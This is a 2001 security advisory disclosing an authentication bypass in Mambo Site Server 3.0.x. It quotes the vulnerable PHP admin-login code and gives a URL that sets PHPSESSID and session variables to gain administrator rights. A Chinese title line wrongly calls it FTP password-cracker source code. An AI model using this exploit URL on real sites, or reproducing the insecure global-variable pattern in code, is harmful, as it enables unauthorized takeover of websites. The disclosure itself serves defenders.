mambo_advisorie.txt

一个FTP密码破解程序的源代码

Serious security hole in Mambo Site Server version 3.0.X
Jul, 24 2001
by: Ismael Peinado Palomo - postmaster@reverseonline.com
www.reverseonline.com

Summary 
Mambo Site Server is a dynamic portal engine and content management tool
based on PHP and MySQL.

Details 
Vulnerable systems: 
Mambo Site Server version 3.0.0 - 3.0.5

Immune systems: 

Impact: 
Any user can gain administrator privileges. 

Exploits: 

Under 'administrator/' dir. we found that index.php checks the user and password:

if (isset($submit)){
		$query  = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
		$result = $database->openConnectionWithReturn($query);
		if (mysql_num_rows($result)!= 0){
			list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
			
			.....

			if (strcmp($dbpass,$pass)) {
				//if the password entered does not match the database record ask user to login again
				print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
			}else {
				//if the password matches the database
				if ($remember!="on"){
					//if the user does not want the password remembered and the cookie is set, delete the cookie
					if ($passwordcookie!=""){
						setcookie("passwordcookie");
						$passwordcookie="";						
					}
				}
				//set up the admin session then take the user into the admin section of the site
				session_register("myname");
				session_register("fullname");
				session_register("userid");
				print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
				print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
				
			}
		}else {
			print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
		}

as we can see if the password for administrator matches the one in the database, some variables are registered in the session and we are redirected to index2.php...so lets take a look at index2.php....

	if (!$PHPSESSID){
		print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
		exit(0);
		}
	else {
		session_start();
		if (!$myname) session_register("myname");
		if (!$fullname) session_register("fullname");
		if (!$uid) session_register("userid");
		}

Here we can see the only verification of a valid user is through the global var. PHPSESSID, so if we declare that variable on the url, and set the 'myname','fullname' and 'userid' we can gain administrative control...so we'll test:

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

BINGO!! now we have full administrative privileges...that's a typical example of PHP hacking...it's clear that security can't rely on global variables since they may be modifyed through url parsing.

Ismael Peinado Palomo
Ingeniero Jefe I+D
postmaster@reverseonline.com
www.reverseonline.com